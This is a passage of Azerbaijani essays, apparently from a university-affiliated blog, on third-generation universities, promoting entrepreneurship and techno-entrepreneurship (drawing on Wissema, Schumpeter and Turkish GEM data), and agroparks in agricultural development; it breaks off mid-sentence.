İnformasiya iqtisadiyyatının üç əsas ünsürü vardır: tədqiqat və işləmə, innovasiya (yenilikçilik) və təşəbbüskarlıq. Bu üç amilin birləşməsi nəticəsində əmələ gələn informasiya iqtisadi artımın əsas hərəkətverici qüvvəsi olmuşdur. Bu isə yeni ekosistemdə universitetlərin sənaye müəssisələri ilə əməkdaşlıq etmələrini məcburiyyət halına gətirmiş, universitetlər və elmi tədqiqat institutları klassik vəzifələrindən əlavə bu yeni vəzifəni yerinə yetirmək üçün bütün tərəfdaşları ilə yeni növ münasibətlər qurmağa başlamasına səbəb olmuşdur. Buna misal olaraq universitetlərdə patentlərin, başqa mənbədən maliyyələşən layihələrin artmasını, texnoparklar və inkubasiya mərkəzlərinin qurulmasını, “informasiyanın kommersiyalaşdırılması” məsələlərinin ön plana çıxmasını göstərə bilərik.

Bütün bu yeniliklər fonunda adət etdiyimiz, ənənəvi universitet tipindən fərqli, yeni bir universitet tipinin formalaşması zərurəti ortaya çıxmış, “üçüncü nəsil universitet” anlayışı təklif edilmiş və bir nəzəriyyə formasında təqdim edilmişdir.

Ümumiyyətlə universitetləri tarixi inkişaf baxımından üç yerə ayırmaq mümkündür. Birinci nəsil universitet – orta əsrlər universiteti, ikinci nəsil universitet – Humboldt[1] tipli, elm təməlli universitet, üçüncü nəsil universitet – son zamanlar müzakirə olunan, qismən təşkil olunan universitetlərdir. İnkişaf etmiş ölkələr sonuncu universitet tipinin yayılması istiqamətində xeyli işlər görmüşlər.

İlk universitetlər ortaq və yeganə nümunə əsasında qurulmamışdır. Avropada ilk universitet olan Baloniya Universitetində (1088-ci il) tələbələri mərkəzdə saxlamış və maliyyə mənbəyi tələbələr olmuşdur. Paris Universiteti (1200-ci il) alimləri mərkəzdə saxlamış və maliyyəsi Kilsə tərəfindən təmin edilmişdir. Oksford Universiteti isə (1096-cı il) Kral və dövlət tərəfindən dəstəklənmiş və maliyyələşdirilirmişdir. Bu univer­sitetlərin daha sonra qurulan universitetlərə nümunə təşkil etdiyini söyləmək mümkündür (Vissema, 2009).

İkinci nəsil universitetlərin ilk nümunəsi olaraq Humbold Universiteti (1810-cu il) göstərilir. Baloniya və Humbold Universitetlərinin yaranması arasındakı yeddi yüz il müddət ərzində Avropanın fəlsəfə, təbii elmlər və texnologiya sahələrində sürətlə inkişaf etdiyini, intibah, islahat, əks-islahat hərəkatlarının yaşandığını və nəhayət Maarifçilik dövrünün, sənayeləşmənin və kapitalizmin başladığını müşahidə edirik.

Universitetlərin yuxarıda sadalanan təsnifatını həyata keçirən Prof. Dr. J.G. Vissemanın fikrincə müasir dövrdə universitetlərdən maliyyə mənbəyi yaratmaq və təşəbbüskar olmaq tələb olunur. İkinci nəsil universitetlərlə müqayisədə üçüncü nəsil universitetlərin fərqləndirici xüsusiyyətləri ətraf aləmi kəşf etməkdən daha çox dəyər yaratmada rol oynamaq; tək bir elm sahəsi istiqamətində araşdırma aparmaq əvəzinə fənlərarası araşdırmalara üstünlük vermək; elm insanından daha çox təşəbbüskar insan yetişdirmək, təhsil və ümumbəşəri düşüncə tərzinə malik idarəetmə sisteminə malik omaqdır.

Üçüncü nəsil universitetlərin müzakirə edildiyi indiki vaxtda, universitet bir təşkilat olaraq öz gələcəyini, yeni ictimai amilləri düzgün analiz edilməsi ilə zəmanət altına ala bilər. Müasir universitetlərin yenilənmə məcburiyyətinə təsir edən faktorları aşağıdakı kimi qruplaşdıra bilərik (Vissema, 2009: 21-29):

  1. Ali təhsilin ictimailəşməsi,
  2. Qloballaşma,
  3. Fənlərarası araşdırmaların vacibliyinin artması,
  4. Araşdırmanın əsas informasiya istehsalı modeli olaraq yayılması,
  5. Xərclərin artması,
  6. Universitetxarici sektorların informasiya əsrində müstəqil olaraq ortaya çıxması,
  7. Fərdiliyin, yenilik və təşəbbüskarlıq kontekstində güclənməsi,
  8. Professional idarə etməyə duyulan ehtiyacın artması.

 

Universitet 3.0

Universitet 3.0

Formalaşması və inkişafı bir növ zərurət olan yeni nəsil universitetlər bizim fikrimizcə sadəcə müəyyən ixtisasa yiyələnmiş məzunlar deyil, üzvü olduğu cəmiyyətin tarixi təcrübələrinə və milli-mənəvi dəyərlərinə sahib çıxmaq şərti ilə bütün insanlığa faydalı olacaq məzunlar yetişdirməlidir. Bu isə ümumilikdə universitet anlayışının yenilənməsini tələb edir. Çünki, sənaye inqilabının və sənaye cəmiyyətinin tələblərinə uyğun olaraq təşkil edilmiş universitet tipi ilə postindustrial (sənaye sonrası) cəmiyyətin tələblərinə cavab vermək mümkün deyildir. Ali məktəb tələblərinin diplom almaqdan, ali təhsil qurumlarının isə məzun sayını artırmaqdan daha böyük bir “dərd”ləri olmazsa cəmiyyətdə ictimai məsuliyyət yavaş-yavaş yox olmağa başlayar ki, bu da arzuedilməz problemlərlə nəticələnər.

Sevindirici haldır ki,  ADAU-da son illərdə müasir dünyanın tələblərinə uyğun kadr hazırlanması istiqamətində bir çox addımlar atılmış, xırda və iri miqyaslı layihələr həyata keçirilmişdir. Tələblərə təşəbbüskarlıq qabiliyyətinin aşılanması məqsədi ilə Azərbaycanda ilk dəfə “Təşəbbüs və işgüzarlıq” adlı fənn təsis edilərək “Menecment” və “Marketinq” ixtisaslarında təhsil alan üçüncü kurs tələbələrinə tədris edilməyə başlanmışdır. Bundan başqa, tələbələrin komandada işləmək, öz üzərinə məsuliyyət götürmək və müxtəlif layihələrdə iştirak edərək praktik qabiliyyətlərini inkişaf etdirmək məqsədi ilə Tələbə Elmi Cəmiyyətinin (TEC) nəzdində müxtəlif tələbə klubları yaradılmışdır. Professor-müəllim heyətinin və tələbələrin öz ideyalarını məhsula çevirərək bazara çıxara bilməyi üçün çox vacib şərt olan “Aqrobiznes İnkubatoru”nun yaradılması üçün layihə işlənmiş və Azərbaycan Respublikasının Prezidenti yanında Elmin İnkişafı Fonduna təqdim edilmişdir. Biz inanırıq ki, atılmış ilkin addımlar tezliklə öz bəhrəsini verəcək.

[1] Vilhelm fon Humboldt – (22 İyun 1767, Potsdam- 8 Aprel 1835, Tegel) Alman filosof, dilçi və dövlət adamı. Berlin Universitetinin qurucularındandır(bugünkü Humboldt-Universitätzu Berlin)

WISSEMA, Johan Gooitzen, (2009) Üçüncü Kuşak Üniversitelere Doğru, Çev.:Özyeğin Üniversitesi, Özyeğin Üniversitesi Yayınları, İstanbul,2009.

Təşəbbüskarlıq anlayışı və təşəbbüskarlığın təşviqi

Ümumi mənada təşəbbüskarlıq anlayışına müəssisənin yaradılması, ehtiyatların toplanması və təsisi və fürsətlərin qiymətləndirilməsi üçün bir təşkilati quruluşun qurulması daxildir. Başqa sözlə təşəbbüskarlıq, təşkilatın yaradılması üçün edilən işlər ilə başlayır və qurulan müəssisənin (təşkilatın) öz özünü idarə edə bildiyi mərhələyə gəldikdə ya da uğursuz olduğu zaman isə sona çatar. Bu çərçivədə, təşəbbüskar fərdi ya da komanda olaraq, fürsətləri diaqnoz edib, bunun üçün lazım olan resursları yığıb təşkilatı quran və davam etdirmə mərhələsinə gətirən şəxslər olaraq təyin oluna bilər.

Avstriyalı iqtisadçı Jozef Şhumpeter təşəbbüskarlığı iqtisadi nəzəriyyəsinin təməllərini atmışdır. Şhumpeterin çıxış nöqtəsi iqtisadiyyatın bir sistem olduğu lakin, dəyişikliyin neo-klassiklərin dediyi kimi xaricdən deyil daxildən gəldiyi fərziyyəsidir. Bu daxili dəyişikliyin reallaşmasını təmin edən isə təşəbbüskarların şəxsən özləridir. Şhumpeter, Theory of Economic Development adlı əsərində, “təşəbbüskar ruhlu yeni firmaların daha az yenilikçi olanları yerlərindən edərək, yəni bir yaradıcı məhvetməyə (creative destruction) səbəb olaraq iqtisadi inkişafın sürətini artırdığı” fikrini müdafiə etmişdir.

Theory of Economic Development ile ilgili görsel sonucu

Şhumpeter Capitalism and Democracy adlı əsərində isə, böyük və sümükləşmiş şirkətlərin dəyişiklə mübarizə apardıqları üçün, təşəbbüskarların yeni firmalar qurub yenilikçi fəaliyyətin artmasına səbəb olduğunu ifadə etmişdir. Şchumpeterin fikrincə, təşəbbüskarların vəzifəsi, bir kəşfi və ya daha kütləvi şəkildə tətbiq olunmamış bir texnoloji yeniliyi istifadə edərək, yeni bir ticarət məhsul ortaya çıxarmaq, ya da mövcud bir məhsulu yeni bir şəkildə istehsalı üçün istehsal formasında islahata getmək və ya yeniləməkdir.

Şchumpeterin tərifində təşəbbüskarlıq yenilik etməyi ehtiva etdiyi üçün təşəbbüskar adı mütəmadi olaraq davam edən bir status deyil. Təşəbbüskar yalnız yenilik edirsə təşəbbüskardır. Başqa sözlə, təşəbbüskarlıq bir anlayış və davranış formasıdır. Bu tərifə görə, hər qurucu ya da professional idarəçi təşəbbüskar deyil, amma, yenilik edən hər qurucu və ya professional idarəçi təşəbbüskardır. Bu tərifə əsasən təşəbbüskarlar fürsətləri istifadə edən və yenilik edəndir, ona görə də təşəbbüskarlar yalnız yeni şirkət quranlar deyildir. Bu səbəbdən firmadaki istənlən işçi də yenilik edərək təşəbbüskar ola bilər. Bu cür təşəbbüskarlar “təşkilatdaxili təşəbbüskar” (intrapreneur) adlanır. Bu mənada təşəbbüskarlıq bir növ, mövcud qaynaqlardan kənarda da imkanların axtarılmasını tələb edən idarəetmədir. Təşəbbüskarlar, imkanları diaqnoz edər, lazım olan resursları bir araya gətirər, praktik bir hərəkət planı tətbiq edər və nəticələrini müəyyən bir zamanda və elastik bir şəkildə əldə edər. Nəticə olaraq təşəbbüskarlıq, yenilikçi dəyişikliyi təşviq edən bir fəaliyyətlərdir. Buna görə də təşəbbüskarlığın inkişafının dəstəklənməsi məsələsi dövlət üçün hər zaman mühüm məsələlərdən biridir.

Təşəbbüskarlığın və innovasiyanın iqtisadi böyüməyə müsbət töhfə verdiyi aparılan elmi araşdırmalarla sübut edilmişdir. Bu araşdırmalarda, yenilikdəki artımın iş qurma və iş ləğvetmə dərəcələrində artımla düz mütənasib olduğu müəyyən olunmuşdur. Amerikada Birçin araşdırması, yeni yaradılan məşğulluğun 80% -inin kiçik müəssisələr tərəfindən təmin edildiyi və əsasən kiçik müəssisələrin Amerika iqtisadiyyatının mühərriki olduğunu ortaya çıxarmışdır. Digər tərəfdən, Baldvin, bazara yeni girən müəssisələrin yenilikçi bir davranış mənimsədikləri və yeni müəssisələrin istehlakçılara mütəmadi yeni məhsullar və yüksək keyfiyyətdə xidmət təqdim edərək yenilikdə iştirak etdiyini müəyyən etmişdir. Audretsch və Thurik araşdırmalarında, yenilik nəzəriyyələrinin hədəfinin müəssisə deyil, təşəbbüskar olması lazım olduğunu vurğulamışdır. Audretsch və Thurik müasir iqtisadiyyatın, tədqiqat və işləmə, təşəbbüs sərmayəsinin və yeni müəssisə qurulmasının təşviq edilməsi vasitəsiylə informasiyanın kommersiyalaşdırılmasına əsaslandığı fikrini müdafiə etmişdir. Bu çərçivədə, yeni qurulmuş müəssisələrə maliyyə təmin edilməkdə, universitet və ictimai araşdırma təşkilatlarında yeni firmalar qurulması dəstəklənir, yeni qurulan yüksək texnologiya firmalarına maliyyə təmin edilməsi üçün yeni səhm bazarları yaradılır.

Belə ki, bir çox dövlətlər təşəbbüskarlığı dəstəkləyəcək və qoruyacaq bəzi tədbirlər həyata keçirir. Əslində bazar iqtisadiyyatının əsas şərtlərindən biri də təşəbbüs azadlığı, yəni bazara daxilolma və bazardan çıxış sərbəstliyidir. Dövlətin kiçik və orta biznes sektoruna dəstək verərək etdiyi müdaxilələrin təməlində, kiçik müəssisələrin bazardakı əlverişsiz vəziyyətindən qaynaqlanan bazar uyğunsuzluğunun (market failure) azaldılması fikri dayanır. Riayət edilməli olan inzibati şərtlərin, öhdəliklərin azaldılaraq bazar şərtlərinin daha bərabər bir quruluşa gətirilməsi və kiçik müəssisələrin performans və rəqabət güclərinin artırılması məqsədini daşıyır.

Təşəbbüskarlıq ilk növbədə, iş yeri yaradılması və böyümədə iştirak etməsi səbəbiylə təşviq edilir. Dövrümüzdə yeni işlərin əksəriyyəti, böyük firmalardan çox yeni və kiçik firmalar tərəfindən yaradılır və bu meyl get-gedə güclənir. Təşəbbüskarlıq nisbətlərində daha böyük artım göstərən ölkələr, işsizlik nisbətində də böyük azalmaya nail olurlar. 1990-cı illər ərzində, sürətlə böyüyən firmalar məşğulluq yaradılması prosesində mühüm töhfələr vermişdir. ÜDM-dəki artım bir çox başqa faktordan təsirlənsə də, araşdırmalar, təşəbbüskarlığı iqtisadi böyüməyə müsbət bir töhfə olduğunu göstərir. Təşəbbüskarlıq, inkişafdan geri qalmış bölgələrdə ictimai və iqtisadi uyğunlaşmanın gücləndirilməsinə, iqtisadi fəaliyyətlərin canlanmasına və iş yerlərinin yaradılmasına və ya işsiz yaxud, əlilliyi olan insanların iş həyatına inteqrasiyasına da öz töhfəsini verə bilər.

İkincisi, təşəbbüskarlıq rəqabət mühitinin təmin edilməsinə töhfə verdiyi üçün təşviq edilir. İstər yeni bir firma qurmaq, istər mövcud bir firmanı yenidən qurmaq (məsələn, müəssisənin başqa birinə verilməsindən sonra) yolundakı yeni təşəbbüslər məhsuldarlığı yüksəldir. Bu cür cəhdlər rəqabət təzyiqini artıraraq digər firmaları fəaliyyətlərini yaxşılaşdırmağa və ya yeniliklərə getməyə məcbur edir. Firmaların artan gücü və gətirdikləri yeniliklər, bütünlüklə iqtisadiyyatın rəqabət gücünü artırır. Bu proses, daha çox seçim imkanı yaradır və daha aşağı qiymətlərlə istehlakçılara də fayda verir.

Üçüncü olaraq, təşəbbüskarlıq insanlara öz potensialına həyata keçirməyə imkanını verdiyi üçün təşviq edilir. İşləmək pul qazanmanın yeganə yolu deyil. İnsanların peşə və iş seçimi prosesində təhlükəsizlik, müstəqillik, görülən işlərin müxtəlifliyi və işə maraq kimi başqa meyarlar də rol oynayır. Təşəbbüskar olmaq bu şəxslərə, özlərinə daha yaxşı bir mövqe yaratma imkanını verə bilir.

  1. Reynolds, təşəbbüskarlığın təşviq edilməsi üçün üç yol təklif edir:

Birinci üsul, uyğun çərçivə şərtlərinin hazırlanmasıdır. İqtisadi fəaliyyətin cərəyan edəcəyi təşkilati qaydaların təmin edilməsi, təşəbbüskarlıq siyasətinin əsas ünsürüdür. Təşəbbüskarlıq üçün sabit bir makroiqtisadi mühit və yaxşı işləyən bir bazar sistemi yaradacaq struktur siyasət lazımlıdır. Dövlət, rəqabətli bazar, təşəbbüs sərmayəsi bazarı daxil olmaqla yaxşı işləyən bir sərmayə bazarı, elastik əmək bazarları yaratmalı, müəssisələrin məruz qaldığı ağır inzibati tənzimləmələri sadələşdirməli və firmanın bağlanması və iflasından qaynaqlanan xərcləri azaltmalıdır.

İkinci yol isə, təşəbbüskarlığı dəstəkləyən ictimai davranışların təşviq edilməsidir. Ölkənin ictimai ünsürləri o ölkənin təşəbbüskarlıq səviyyəsinə təsir edir. Əməkdaşlığa açıq cəmiyyətlərdə, təşəbbüskarlıq daha rahat inkişaf edir və təhsil sayəsində təşəbbüskarlığa istiqamətlənmiş müsbət fəaliyyətlər həyata keçirilə bilir.

Üçüncü olaraq da yaxşı hazırlanmış dövlət proqramları da təşəbbüskarlığı təşviq etmək mövzusunda təsirli olur. Proqramlar, ölkə səviyyəsində və regional səviyyədə ünsürlərin cəmindən meydana gələr. Parça-parça və fərqli sahələrə xitab edən proqramların əvəzinə maliyyə proqramları, təhsil xidmətləri, biznes inkubatorları, elm parkları, iş şəbəkələri, çoxluq (cluster) proqramlarını ehtiva edən daha inteqrasiyalı proqramların inkişaf etdirilməsi daha faydalı olardı. Təşəbbüskarlıq üçün daha sağlam bir mühit yaradıla bilməsi üçün, yerli təşəbbüskarlıq siyasətinin yerinə bir-biriylə qarşılıqlı əlaqədə olan, müxtəlif ünsürlərin bir yerdə olduğu daha əhatəli yanaşmaya sahib bir təşəbbüskarlıq siyasəti yürüdülməlidir.

İzlənilə biləcək spesifik strategiyalara nümunə olaraq aşağıdakılar göstərilə bilər: Mediandan istifadə edərək uğurlu biznes, iş adamı və məhsul profillərini tanıtmaq, yerli iqtisadiyyatın bütün sektorlarında uğurlu təşəbbüskarlar ilə müsahibə proqramı hazırlamaq, 18-25 yaşlarında gənclərin oxuyacağı və təşəbbüskarlıq üçün lazım olan xüsusi bacarıqları qazanacağı bir Təşəbbüs Kolleci qurmaq, təşəbbüskarlıq təcrübə proqramları təşkil edib, şagirdləri müvəffəqiyyətli yerli təşəbbüskarlarla bir araya gətirmək, kiçik biznes yay məktəbləri qurub, kiçik biznesin idarə edilməsi sahəsində kurslar təşkil etmək, məktəbləri kiçik biznes inkubatorları olaraq istifadə edib, məktəb mərkəzli bizneslərin qurulmasını və şagirdlərin potensial işlərini qurmasını təmin etmək və yerli ictimai və xüsusi fondları istifadə edərək kiçik təşəbbüs sərmayəsi fondları yaratmaq.

Hökumətlərin təşəbbüskarlığı canlandırmaq və dəstəkləmək üçün görəcəyi tədbirlər əsas olaraq bu başlıqlarda toplana bilər:

Əvvəlcə təşəbbüskar bir düşüncə tərzi yaradılaraq uğurlu təşəbbüskarlar kütləvi formada tanıdılmalı və bu uğurdan, potensial təşəbbüskarların cəsarət almağı təmin edilməlidir. İkincisi, gənc təşəbbüskarlar, qadınlar və işsizlər kimi müəyyən hədəf qrupları təyin olunaraq, bu qruplara istiqamətlənmiş strategiyanın inkişaf etdirilməsi təmin edilməlidir. Üçüncü, təhsil proqramları, kurs və seminarlarla təşəbbüskarlıq təhsilinin verilməsi təmin edilməlidir. Dördüncüsü, inzibati və hüquqi sahələrdə bazara daxil olmaq üçün maneələrinin aradan qaldırılması və biznes qurma prosesinin sadələşdirilməsi təmin edilməlidir. Beşincisi, yeni işə başlayacaq təşəbbüskarlara quruluş mərhələsində məsləhət və biznes planlaşdırma xidmətlərinin verilməsi təmin edilməlidir. Son olaraq da, təşəbbüskarların maliyyələşdirilməsi sahəsində təşəbbüs sərmayəsi və mələk investor kimi müxtəlif sərmayə mənbələrindən istifadə olunması təmin edilməlidir.

Mələk investorlar yenilikçi və uğurlu ola biləcəyinə dair ümid verən təşəbbüskarlıq layihələrinə quruluş ya da ilk mərhələlərdə maliyyə və təşkilati dəstək təmin edən varlı fərdi investorlara deyilir. Mələk investor şəbəkələri də, mələk investorlar və təşəbbüskarlar arasında əlaqələrin qurulması üçün kömək edir.

Ədəbiyyat:

Nazlı Hezar TANRISEVER “Avrupa birliğinde girişimciliğin teşvik edilmesi için izlenen politikalar ve Türkiye’deki Politikalarin Avrupa Birliği uygulamalarina uyumu

Economic Development ile ilgili görsel sonucu

Texno-təşəbbüskarlıq – gələcəyi formalaşdıran fəaliyyət.
texnoloji inkişaf

Təkərin kəşfindən bu yana bəşəriyyət daima texniki və texnoloji yeniliklər sayəsində irəliləmiş və bu mövcud səviyyəyə çatmışdır. Bu yeniliklər şübhəsiz ki məhz təşəbbüskar insanların zəhmətləri nəticəsində mümkündür. Məlumdur ki, təşəbbüskarın uğurlu olması üçün ilk və ən mühüm şərt, əmtəəyə çevrilmə potensialı yüksək, yeni bir fikrin/məhsulun bazara təqdim edilməsidir. Xüsusilə, təşəbbüskarın işini davam etdirmək üçün əlində böyük miqdarda sərmayə olmadığı nəzərə alındıqda, davamlı inkişafın təmin edilməsi üçün təqdim edilən məhsul/xidmət ya bazarda mövcud olmamalı ya da rəqiblərinə qarşı üstünlük təmin edəcək yeni imkanlarının olmalıdır. Bazar iqtisadiyyatı şəraitində iqtisadi dəyər müəyyən bir ehtiyacın təmin olunması mənasını verir. Əksər hallarda təşəbbüskarın yaratdığı məhsula olan ehtiyac, kəmiyyət və keyfiyyət etibarı ilə fərqli olsa da müəyyən formada qarşılanır. Buna görə də təşəbbüskar, mövcud şablonları dəyişdirəcək yeni yanaşma tərzi inkişaf etdirməlidir. Bir başqa vəziyyət isə bazarda bir ehtiyac və ya tələbat mövcuddur amma buna cavab verəcək əmtəə yoxdur. Bu vəziyyətdə yeni bir “şey” etmək tələb olunur.

Hər iki vəziyyətdə, yeni texnologiyalara əsaslanan təşəbbüskarlığın əhəmiyyəti meydana çıxır. Texnologiya sahəsində müşahidə edilən dəyişikliklər, proqram təminatı sektoru başda olmaqla gen mühəndisliyi, toxuma mühəndisliyi kimi geniş miqyaslı və məşğulluq profilinə malik müxtəlif yeni sənaye sahələrinin ortaya çıxmasını təmin etmişdir. Bu sahələrdə, son 30 ildə elm və texnologiyanın nailiyyətlərinin yarıdan çoxunun, hələ əmtəə halına gəlmədiyini nəzərə alsaq, texno-təşəbbüskarlığın əhəmiyyəti və potensialı daha yaxşı aydın olar. Texnoloji təşəbbüs və ya qısaca texno-təşəbbüs adı verilən proses, yeni texnologiya əsasında həllərdən faydalanaraq iqtisadi dəyər yaratmağı və bundan gəlir əldə etməyi qarşısına hədəf qoyur. Texno-təşəbbüskar öz maraq dairəsinə uyğun hələ aşkar edilməmiş müəyyən ehtiyacın mövcud olmayan bir yolla qarşılanması istiqamətində fəaliyyət göstərir.

Texno-təşəbbüskarlar; qeyri-müəyyənliyi yaşamağa istəkli, dözümlü və sıravi şəxslərə nisbətən gələcəkdəki çətinliklər barəsində daha çox məlumatlı olmalıdır. Dəyişiklik, əksər hallarda əvvəlcədən işarələr verir. Uğurlu texno-təşəbbüskarlar, bu işarələri təsbit etməyi və onlardan faydalanmağı bacarırlar. Onlar, bu cür işarələr vasitəsi ilə işlə bağlı maraqlı qurğular kəşf edirlər. Texno-təşəbbüskar, proqnozlaşdırma və sezmə qabiliyyəti ilə bazar yaratmaq və inkişaf  etdirmək bacarığına sahib, texnologiya yarada bilən və innovasiyanın idarə edilməsi qabiliyyətinə malik təşəbbüskarlardır. Texno-təşəbbüskarların uğurlu olması proqnozların mümkün mərtəbə düzgün və həqiqi olmasından asılıdır. Texno-təşəbbüskarların ucuz texnologiyaya dair təşəbbüskardan fərqli olaraq fəaliyyət göstərmək istədiyi sahədə daha yaxşı ixtisaslaşmış və bu sahədə yaxşı yetişmiş olması vacibdir. Texno-təşəbbüskarlığın ən böyük üstünlüklərindən biri az sərmayə ilə çox yüksək böyümə potensialının olmasıdır. Məsələn, hamımızın yaxından tanıdığı Microsoftun qurucusu və sahibi Bili Gates texno-təşəbbüskara ən yaxşı nümunədir.

Texno-təşəbbüskarlığın inkişaf etdirilməsi üçün mühəndislik ixtisasında təhsil alan tələbələrə öz ixtisası ilə bağlı biliklərlə yanaşı təşəbbüskarlıq barəsində də biliklər  verilməlidir. Təşəbbüskarlıq təhsili proqramında ümumiyyətlə risklərin idarə edilməsi mövzusu da olmalıdır. Texno-təşəbbüskar, qarşılaşdığı iş fürsətini qiymətləndirmək üçün fəaliyyətlərdən ibarət olan bir plana ehtiyac duyur. Buna görə bu istiqamətdə də müəyyən biliklərinin olması vacibdir. Bu fəaliyyətlərə aid vəzifələr iş fürsətinin doğru qavranmasına, iş ortaqlarının doğru şəkildə motivasiya edilməsinə ehtiyac var. Şəriklərə və maraqlı tərəflərə lazım olan motivasiya təmin edilməzsə, onlar imkanlarını nəzərdə tutulan iş sahəsinə yönəltməyə həvəsli olmazlar.

Texno-təşəbbüskarlıq üçün maarifləndirmə ehtiyacı böyük əhəmiyyətə malikdir. Texno-təşəbbüskarlar əvvəlcə texnoloji riskləri boynuna götürmək məcburiyyətində qalır. Bir çox hallarda o zamana qədər təsdiq edilməmiş texnologiyalara əsaslanır. Bəzən bazardakı ehtiyaclardan qaynaqlansa da; əsas diqqəti texnologiya inkişaf etdirməyə yönəltmək lazımdır. Texno-təşəbbüskarların ən ciddi problemlərindən biri də, inkişaf etdirilən həlli laboratoriya mühitindən bazar (sənaye) şərtlərinə yüksəltmək məsələsidir. Bir çox fikir və ya innovasiya, laboratoriya mühitində çox uğurlu görünsə də sənayedə tətbiq edilərkən müxtəlif mənbələrdən qaynaqlanan çox ciddi problemlər yaşa bilir. Bu cür problemlərin yerindəcə həll edilməsi üçün müasir universitetlərdə texnoparklar, aqroparklar və s. yaradılaraq həm yeni fikirlərin sənayeyə tətbiqinə, həm də məhsulun bazarın tələblərinə uyğun olmasına köməklik göstərilir.

İstər təşəbbüskarlıq tədrisi, istər texnoparkların istifadəyə verilməsi ölkəmizdə son bir neçə ildə gündəmə gəlsə də Türkiyədə bu istiqamətdə müəyyən uğurlar əldə edilmişdir. Məsələn: 2014-ci ildə Türkiyədə  ilk dəfə regional səviyyədə aparılan, dünyanın ən geniş miqyaslı təşəbbüskarlıq layihəsi olan və təşəbbüskarlığın iqtisadi böyümə prosesində əhəmiyyətini ortaya qoyan Qlobal Sahibkarlıq Monitoru (Global Entrepreneurship Monitor-GEM) keçirildi. Bu layihə ora daxil olan ölkələr arasında 31 mindən çox insanın iştirakıyla ən çox anket sorğusu edən və 26 bölgə səviyyəsində həyata keçirilən tək layihə olaraq diqqətlə izlənildi. GEM layihəsində 2014-ci il qlobal araşdırmalarda isə dünya əhalisinin təxminən 73%-i, ÜDM-in isə 90%-ni təmsil edən 73 ölkə iştirak etmişdir. Hesabatın bəzi hissələrinə nəzər salaq:

1

Şəkil 1. Potensial təşəbbüskarlar [2. Səh-5].

Hesabatın nəticələrinə görə Türkiyədə təşəbbüskarlıq xüsusiyyətlərinə sahib potensial təşəbbüskar nisbətində son illərdə əhəmiyyətli bir artım olmuşdur. 2013-cü ildə Türkiyədə 18-64 yaş arasındakı  əhalinin  38,63%-i növbəti 6 ay ərzində yeni bir işə başlamaq üçün fürsət meydana gələcəyinə inanarkən, 2014-cü ildə əhalinin bu hissəsinin təşəbbüskarlığa olan inamının 39,8% -ə çatdığı müşahidə edilmişdir. Şübhəsiz ki, bu inamın formalaşmasında KOSGEB-in (Küçük ve Orta Ölçekli İşletmeleri Geliştirme ve Destekleme İdaresi Başkanlığı) rolu böyükdür, bu idarə barəsində növbəti yazılarda məlumat verməyə çalışacam.

Araşdırmalar göstərir ki, qurulan hər yeni müəssisə, öz işini quran şəxsdən başqa orta hesabla 7 nəfərə də məşğulluq imkanı təmin edir. Bu mühüm məşğulluq vasitəsinin düzgün şəkildə istifadə edilməsi, məşğulluq imkanlarını artırmağa və ehtiyatlardan maksimum faydalanmağa imkan verəcək.

Bütün bunları nəzərə alaraq texno-təşəbbüskarlığın inkişafına xüsusi diqqət yetirilməli olduğunu düşünürəm. Bu istiqamətdə ölkəmizdə görülən işlər arasında müxtəlif bölgələrində texnoparkların, sənaye parklarının, aqroparkların, inkubasiya mərkəzlərinin yaradılması, bu istiqamətdə fəaliyyət göstərmək istəyən şəxslərin dövlət tərəfindən dəstəklənməsi  təqdirəlayiqdir. Hesab edirik ki, yaradılan infrastrukturdan arzu olunan formada istifadə edilməsi üçün bütün sahələrdə, o cümlədən mühəndislik sahəsində təşəbbüskar insanların sayının artmasına çalışmaq və bu istiqamətdə müvafiq dərslərin tədrisini təşkil etmək lazımdır.

Ədəbiyyat.

  1. Gürcan Banger – “Teknoloji, Tekno Girişim ve Gelecek”
  2. Türkiye’nin 2014 Küresel Girişimcilik Endeksi Sonuçları
Aqroparklar müasir iqtisadiyyatın tələblərindən biri kimi.
aqropark0002

Aqrar sahə istər inkişaf etmiş, istərsə də inkişaf etməkdə olan bütün ölkələrdə əhalinin gündəlik qida tələbatını ödəməsi, sənayeni xammalla təmin etməsi və sənaye məhsullarına tələb yaratması, ÜDM və ixracatda rolu baxımından daima  digər sahələrdən üstün olmuşdur. Əhalinin sayı ilə kənd təsərrüfatına yararlı torpaqların inkişafı tərs mütənasib olduğundan məhsuldarlığın artırılması məsələsi indiki vaxtda daha çox önəm kəsb etməyə başlamışdır. Bu məsələni uğurla həll etmək üçün aqrar sahənin inkişafı və dayanıqlılığının təmin edilməsi məsələsi bioloji, ekoloji, iqtisadi və sosial tərəfləri ilə birgə qiymətləndirilməlidir.

Əhalinin zəruri ərzaq malları ilə təminatı strateji məsələ olduğundan daima dövlətin birbaşa nəzarətində olur. Buna görə də aqrar sahənin inkişaf səviyyəsi baxımından inkişaf etmiş ölkələr həmişə üstün mövqedə olmuşlar. Kənd təsərrüfatı məhsulları ixracında paylarına görə ölkələr siyahısında  ilk beşlik ABŞ, Braziliya, Çin, Kanada və Hindistandır. Ayrı-ayrı məhsul növləri üzrə Türkiyə, Rusiya, Almaniya, İtaliya, Misir və İran respublikaları da ön sırada yer alır. Qardaş Türkiyə, BMT-nin Ərzaq və Kənd Təsərrüfatı Təşkilatının 2013-cü il məlumatlarına əsasən fındıq, heyva, albalı, əncir, və ərik istehsalı üzrə dünya lideri, həmçinin, müxtəlif məhsullar üzrə ilk beşlikdə yerləşir.

Azərbaycan Respublikası da istər sahib olduğu məhsuldar torpaqlar, istər müxtəlif iqlim tiplərini özündə birləşdirən coğrafiyası kimi fiziki göstəricilər, istərsə də kənd təsərrüfatının ənənəvi sahə olması səbəbiylə aqrar sahədə özünəməxsus yer tutmağa qadirdir. Aqrar sahənin inkişafı üçün tədqiqat və işləmənin, istehsal edilən informasiyanın kommersiyalaşdırılması fonunda yeni fürsətlər dəyərləndirilir və bu sahədə lazımı qanunvericilik formalaşdırılır.  Bu məqsədlə Azərbaycan Respublikası Prezidenti tərəfindən 3 may 2011-ci il tarixdə “Azərbaycanda aqrar sahədə idarəçiliyin təkmilləşdirilməsi və aqrar elmin inkişaf etdirilməsi ilə bağlı Xüsusi Komissiyanın yaradılması barədə” sərəncam imzalanmışdır. Bu və buna bənzər sərəncamların icrası zamanı düzgün informasiyanın istehsal edilərək yayılması ilə fermerlərin maarifləndirilməsi və istiqamətləndirilməsi, uzun müddətli dövrdə birbaşa maliyyə dəstəyi  kimi məsələnin müvəqqəti həllindən daha faydalı olardı. Aqrar yönümlü texnoparklar və ya aqroparklar məhz bu məqsədlə yaradılır və inkişaf etdirilir. Azərbaycan Respublikasının Prezidentinin 16 aprel 2014-cü il tarixli “Aqrar sahədə idarəetmənin 